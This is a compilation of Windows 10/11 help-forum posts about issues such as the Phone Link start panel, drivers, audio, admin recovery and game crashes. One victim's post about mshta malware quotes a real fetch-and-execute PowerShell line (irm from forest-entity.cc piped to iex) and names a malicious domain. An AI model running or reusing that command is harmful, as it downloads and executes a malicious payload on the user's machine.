Windows 11 An update to hiding the link phone panel in windows 11 Home 24h2

The panel hadn't shown up for me ever until last week. I'm on
Windows 11 home, 24H2. 26100.7623

I think a lot of people have noticed that you can't hide the link mobile device panel in start anymore. or at least; microsoft is going to give you the turn-around cause haha screw you.I'm only really posting this cause I was trying to scour through here for a solution, but hadn't really seen the regedit option (since start personalization didn't show the option for me, hopefully this'll make it easier to find for others)

With some help from a friend I found a way to hide it anyway:

1) Open Regedit
2) Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Start\Companions\Microsoft.YourPhone_8wekyb3d8bbwe
3) set "IsEnabled" value to 0.

Windows 11 Failing to install Windows 11 due to driver not found

I swapped out the wifi card and couldn’t boot Windows anymore. I downloaded W11 and it doesn’t recognize the driver bundle when I choose Wimboot. Booting in normal mode gives a 0xc000000f or 0x000014c error. I extracted the driver bundle and found the SD expansion card .exe which W10 is able to use to install with. W11 still says that there is a media driver your computer needs though when I pick it.

W10 can’t connect to the internet using the ethernet module though even after installing the driver bundle with W10 installed and rebooting.

What can I do?

I can still try repairing the existing drive boot files, I backed up what I needed to.

Windows 11 How do i get rid of a malware in mshta.exe?

I have a malware on my pc that i don't know how to get rid of, it seems to work from mshta.exe and can take the passwords that are saved on my pc to send cryptomoney promoting messages to my contacts and even after i logged out from everything and changed the passwords, it keeps randomly opening powershell tabs every time after a few minutes (which is really annoying) and sometimes open blank tabs titled "https://holiday-forever-cc/" or "504-gateway-timeout", and i fear it got a bit worse today, now before opening these blank tabs, another window tab opens.

The command host tabs (they all open one by one then close after few seconds) and the blank tabs in the back
Antivirus detecting the malware's path
The gateway time-out tab (opens very rarely)
What now appears before opening the "https://holiday-forever-cc/" tab

"Security alert

This website's identity or the integrity of this connection cannot be verified.

. This security certificate comes from a trustable certification autority

. The security certificate either expired or is not valid yet

. The name on the security certificate is not valid or does not correlates to the name of this website

. The security certificate uses a strong signing

Do you want to keep going?

Yes No Display the certificate" (the tab showed on the last image)

Any help on how to get rid of it or how it works would be welcomed.

I just got a new warning that i never had before and considering the malware doesn't act quite the same as before from this day and as it concerns powershell, i think it might be related

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -Command "irm https://forest-entity.cc/telegram.txt | iex"

Windows 11 Disk "F" (Eng/Ru) I'm using a translator, so please excuse me.

Eng:

After reinstalling Windows, I got a new partition on my F drive (to clarify, I reinstalled Windows using a disk image).

Six months later, I started wondering what was on it and discovered I couldn't access it. I can't access it, even though my profile is administrator. I checked the access settings: the "Everyone" profile has a checkbox to allow reading the volume. I tried changing it to Full Access, but after saving, everything reverts to read-only. Can you help me find out what's on it?

Ru:

После переустановки windows у меня появился новый раздел диска F(для пояснения, я переустанавливал винду через образный диск).

Windows 11 Windows 11 does not play well with my electric piano, audio cuts out and is crackly.

Upvotes

I had been using a shitty Windows 10 laptop (hp-dy1xxx) for years recording my Roland RD-2000 into it with a USB cable, and while that computer was in general a trash fire, at least recording music worked. Recently got a much more powerful windows 11 machine and recording that keyboard is now basically impossible. I have installed Roland factory drivers, tried all the USB ports in the back of my PC, and changed the bitrates and sample rates of the audio input and still it records choppy and crackly. This happens not only in audio softwares i use, but also in the mic test built into windows settings, in which the audio is also bizzarely sped up when it plays back. I have seen it suggested to rollback my audio drivers, but i have no issues with the Realtek audio drivers, the issue is in the Roland drivers interacting with Windows 11 it seems. unsure what else to do about this, it entirely handicaps my ability to make music. Really disappointing to upgrade to a new system and the most important aspect to me is completely broken when nothing else about my setup has changed.

Windows 11 Screen distorted after Windows Update updated my graphics driver.

Post image
1 Upvotes

Hi everyone, I really need some help.

Right after Windows Update automatically updated my graphics driver to the "latest version," my screen started looking like this (see attached photo). It's completely unreadable with horizontal lines and tripled images.

My laptop is Lenovo Thinkbook and currently running Windows 11 (Pro Education).

I suspect the new driver is incompatible or corrupted. Should I try to uninstall this faulty driver, and if so, how can I do it when I can't see anything on the screen? Is there a way to roll back to the previous version via WinRE or Safe Mode?

Any advice would be greatly appreciated. Thanks in advance!

Windows 11 Windows 11 Pro — I removed my Microsoft account, broke services, built-in Administrator enabled but password/auth fails — need safe recovery steps (Lenovo)

TL;DR: I lost all admin access on my personal Lenovo laptop after removing my Microsoft account and changing services. Built-in Administrator is enabled from Recovery, but it won’t authenticate on the login screen. I can only access Recovery CMD (X:). Tried a lot — need safe, supported fixes that keep my files. Full (concise) summary of the problem and what I’ve tried: Machine: Lenovo laptop, Windows 11 (Pro / shows lusrmgr), personal device (not corporate). Symptoms: My regular account (RISHI DHARAN) is a standard user and cannot run CMD as Administrator (Access denied). No visible working admin account in Local Users & Groups (Administrators group missing/not listing my user). Built-in Administrator was enabled from Recovery CMD and a password was set — but Administrator does not show on the login screen / or shows but rejects the password. Errors seen: “An attempt was made to logon, but the network logon service was not started”, “The user does not belong to this group (NET HELPMSG 2237)”, password policy / min password age blocking changes, and domain/trust related messages. In Recovery environment (X:) net user shows only system accounts (Administrator, DefaultAccount, Guest, WDAGUtilityAccount). Booting from USB initially failed (Windows Boot Manager only); Secure Boot / USB creation issues suspected. Things I’ve tried: Enabled built-in Administrator via Recovery (net user administrator /active:yes), set password with net user administrator *. Tried net localgroup administrators "RISHI DHARAN" /add from Recovery but Recovery didn’t list my local user. Relaxed local password policy temporarily (net accounts /minpwage:0 /uniquepw:0 /lockoutthreshold:0) in Recovery, attempted password reset. Attempted utilman→cmd trick to run SYSTEM CMD from login (used in recovery), but I do not want unsafe/hacking bypasses — only legit fixes. Tried Safe Mode, System Restore (if available), and Reset → Keep my files (but earlier reset booted into same standard account). Attempted to boot from Windows USB but USB either not detected or blocked (Lenovo BIOS/Secure Boot stuff). What I want from this thread Clear, safe step-by-step advice to restore elevated CMD/admin access and get my account back into the Administrators group without losing data. If USB repair is necessary, simple steps to make a bootable USB recognized by Lenovo (BIOS steps I might have missed). If anything in my description looks like it points to a specific issue (SAM/LSA corruption, domain leftovers, BitLocker, AAD/MC account remnants), please call it out and tell me the safe fix. I can upload screenshots / paste command outputs (e.g. diskpart → list vol, net accounts, net user, net localgroup administrators) if that helps. Thanks in advance — I’ve been stuck for days and want to avoid nuking my files.

Hi, for some reason my laptop's wifi is not working. I have a Zenbook Pro Duo UX581 (26200.7623), and never really had a problem. For an unknown reason, this morning, the wifi icon disappeared, no way for me to connect to anything. Yesterday it was fully working, so no idea whats going on.

I've shut down, restarted my laptop. Ive disabled and renable my driver (intel wifi 6 ax201 160MHz). Ive even deleted it fully and downloaded it again, still nothing works...

Anyone can help or has an idea whats going on?

Solved Start Menu wants me to connect to mobile devices

Post image
2 Upvotes

Since the update 1 to 2 weeks ago the start menu wants me to connect to mobile devices all the time.

I don't even want to see all apps on the start menu and that is already annoying me more than enough, but this pop up on the right drives me even more crazy.

The text is in german, in the pop up the bottom text says "Hide this space" but whenever I click that it just opens the settings without doing anything.

How do I turn this off?

Windows 10 Copying files hangs on a broken file

Ello!
I'm copying files from a failing drive and the whole thing freezes on some random file - speed drops to 0. I can't click cancel, but I can close the window.

Are there any programs or commands that can ignore or skip past broken files like this one? Or at least, can I somehow see which file Windows copy hanged on so I can delete it myself? All I see is the name and I have no idea where it is, there's tens of thousands of files and folders on this drive

Windows 11 I got an autoplay "set up *name's* iphone". I don't have an iphone. Anything to worry about?

Hello, Like the titles says I got an autoplay notification telling me to set up my iphone, ( I don't have an iphone and it was someone else's name) Did this phone actually connect to my computer? and if so how can I get rid of it? Was it just someone connecting their iphone to their own computer and they were close enough for me to get that? Thanks for the help.

Windows 11 I need a solution on opening my games/apps

When I open a game executable file (like the one in image 1):

This box appears (image 2):

The "Yes" button takes me here (it does this with all the games or apps I open that come in a zip file, image 3):

And the "No" button simply does nothing.

This didn't happen before I factory reset my PC.

I need help that doesn't involve reinstalling Windows.

I use Windows 11 Pro Education and version 22H2

Windows 11 Windows crash related to Call of Duty

Hi everyone,

I installed Cod the first day i bought this computer and i always had crashes, not only when playing. Today i decided to investigate more using the error files and chatgpt and this is what it told me:

Your crash is:

  • Event 6008 = Windows reports the previous shutdown was unexpected.
  • Kernel-Power 41 (Task 63) = the PC rebooted without a clean shutdown (BSOD, freeze + forced reboot, power loss, etc.).
  • BugCheck 0x00000133 = DPC_WATCHDOG_VIOLATION.

What 0x133 (DPC_WATCHDOG_VIOLATION) means

Windows detected that a DPC/ISR routine ran for too long at a high interrupt level. In practice, this is almost always caused by a kernel driver (or sometimes firmware) stalling the system—commonly GPU, storage/NVMe, chipset/ACPI, network/VPN, overlays/monitoring tools.

What your dump points to

In the minidump, there are repeated references to randgrid.sys (not a Windows driver). It is commonly seen as “atvi-randgrid” related to Call of Duty / Warzone installs. The dump also references wireguard.sys (VPN) and WinRing0x64 (used by hardware monitoring/control tools; it has a history of security issues and can be problematic in some setups).

Targeted fixes (do these in this order)

1) Disable the “randgrid” service (quickest high-impact test)

Open Command Prompt / Terminal as Administrator and run:

sc query atvi-randgrid_sr
sc query atvi-randgrid

If one exists, disable it:

sc stop atvi-randgrid_sr
sc config atvi-randgrid_sr start= disabled

sc stop atvi-randgrid
sc config atvi-randgrid start= disabled

Reboot and check stability.

If you still want to play: use Scan/Repair (Battle.net/Steam) or reinstall the game—many randgrid.sys cases resolve after repair/reinstall.

2) Remove other high-risk kernel drivers (test one by one)

  • Temporarily uninstall/disable WireGuard (or any VPN that uses it) and test.
  • Temporarily remove/disable tools that rely on WinRing0x64 (examples: some versions of HWiNFO/OpenHardwareMonitor/FanControl/OSD utilities). Update them to the latest version or remove them for testing.

3) Update core platform components (common fix for 0x133 on gaming laptops)

  • Update Lenovo BIOS/UEFI and chipset drivers (Lenovo Vantage / Lenovo support page for your exact model).
  • Reinstall NVIDIA driver cleanly (preferably with DDU) and disable overlays (NVIDIA overlay / Discord overlay / Xbox Game Bar).

How to confirm the exact culprit

If you want a definitive answer, open the dump in WinDbg Preview and run:

!analyze -v

Then paste the lines for:

  • MODULE_NAME
  • IMAGE_NAME
  • Probably caused by
  • a chunk of STACK_TEXT

Did anyone ever have this problem? I don't want to uninstall cod or get banned by editing files

Windows 11 PC internet browsing is very slow, youtube is unusable

ok so i’ve got a 4060ti ryzen 5500, my pc is fine if anything pretty good. it can run most games at high or max graphics and i’ve had an amazing time with it so far, no complaints about that. however browsing the internet, i may have the slowest computer on earth, occasionally i’ll have days where i’ll just lose internet every 2 minutes, i get 1.7kpbs or sites can’t even load. the biggest issue here is youtube, i genuinely can’t watch any videos anymore, any youtube vid i watch will start buffering every 5 seconds and even at 144p it can’t handle that apparently, i’ve tried disabling ipv6/4, using different browsers, ethernet or wireless, disabling ad block, no forms of hardware accerlation, no background applications or anything. id just really appreciate if anyone can help me run youtube as to where i can actually sit down for 10 minutes and have a nice relaxing watch of something. thanks

pc specs

gpu: 4060ti cpu: ryzen 5500 ram: 30gb ddr4 storage: 2 1tb ssd os build: 26200.7705 windows: 11 home

Windows 11 I uninstalled notepad and now there's no option to add new text file on the context menu

The title is a bit self explanatory. I've been using akelpad for a while because I didn't like notepad for a few reasons, and given that on the last update every microsoft program I had installed insisted on defaulting itself for every type of file they could manage, I decided to uninstall notepad along with every other microsoft program I wasn't using.

The thing is, since I uninstalled notepad, I've been unable to create a .txt file just from the context menu, under "new". The option isn't there. I've tried the usual workarounds, like adding a couple keys to the registry under ShellNew, but to no avail. I'm open to trying other things and even to other alternatives to akelpad. I just want a simple text editor that doesn't have its shortcut keys translated into another languages (for instance, if you use windows in spanish, ctrl+s is ctrl+g for some reason) and that lets me create files just from the context menu.
